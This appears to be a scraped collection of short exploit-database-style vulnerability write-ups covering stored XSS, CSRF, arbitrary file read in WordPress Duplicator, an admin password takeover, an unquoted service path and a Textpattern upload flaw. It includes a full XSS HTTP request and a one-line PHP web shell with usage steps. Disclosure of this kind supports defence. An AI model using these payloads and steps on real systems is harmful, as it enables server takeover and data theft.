Navigate to target.com/account [This holds administrator login console], Change URL to target.com/account/register [Here able to set new password for the adminstrator user], Now after changing password of administrator and login to console and Navigate to target.com/configuration/authentication and set an new password for any of the users, Now navigate to target.com/webui/repos and login with the recently changed password for user i.e is in step 3, Now you have access to the webadmin server
The application is not using any security token to prevent it against CSRF. Therefore, malicious user can add new administrator user account by using a crafted post request.
A stored cross-site scripting (XSS) vulnerability exists in Company's Recruitment Management System 1.0, which allows an attacker to inject malicious JavaScript code into the 'description' field of the 'Vacancies' tab. An attacker can exploit this vulnerability by logging in with a staff account, navigating to the 'Vacancies' tab, clicking on 'Add New Vacancy', entering any random information in the other fields, and then entering a malicious JavaScript payload in the 'Description' field. When a user views the details of the vacancy, the malicious JavaScript code will be executed in the user's browser.
Mitsubishi Electric & INEA SmartRTU is vulnerable to source code disclosure. An attacker can send a specially crafted HTTP request to the vulnerable server and view the source code of the application. This vulnerability affects Windows systems.
A stored cross-site scripting vulnerability exists in Company's Recruitment Management System 1.0. which allows an attacker to inject malicious JavaScript code into the 'title' field of the 'vacancies' tab. An attacker can exploit this vulnerability by sending a malicious payload to the 'title' field of the 'vacancies' tab. This payload will be executed when a user visits the application.
This exploit allows an unauthenticated attacker to read arbitrary files on the server by exploiting a vulnerability in the Wordpress Plugin Duplicator version 1.3.26. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'file' parameter of the 'duplicator_download' action of the 'admin-ajax.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script, which will allow the attacker to read arbitrary files on the server.
A stored cross-site scripting (XSS) vulnerability in Support Board 3.3.4 allows an attacker to inject malicious JavaScript code into the 'Message' field of a conversation. This code is then stored in the database and executed when the conversation is viewed by an administrator or other user. The malicious code can be used to steal session cookies, redirect users to malicious websites, or perform other malicious actions.
An alert box can be generated with the following payload: GET /lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22XSSVulnerable%22)%3E HTTP/1.1 Host: Forster Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Cookie: PHPSESSID=7db442d0ed0f9c8e21f5151c3711973e User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept-Language: en-gb Accept-Encoding: gzip, deflate Connection: close
Unquoted Service Path is a vulnerability that occurs when the path of a service contains spaces and is not surrounded by quotation marks. This can allow an attacker to insert their own malicious code in the system root path undetected by the OS or other security applications, which can be executed with the elevated privileges of the application.
First of all, an attacker should use the file upload section to upload a malicious shell containing the code <?PHP system($_GET['cmd']);?>. Then, the attacker should go to the content section, click Files and upload the malicious php file. Finally, the attacker should go to the URL of the malicious file with the command as a parameter (e.g. yourserver/textpattern/files/yourphp.php?cmd=yourcode;). After the malicious file is uploaded, the attacker can execute arbitrary commands on the server.
Services By CQR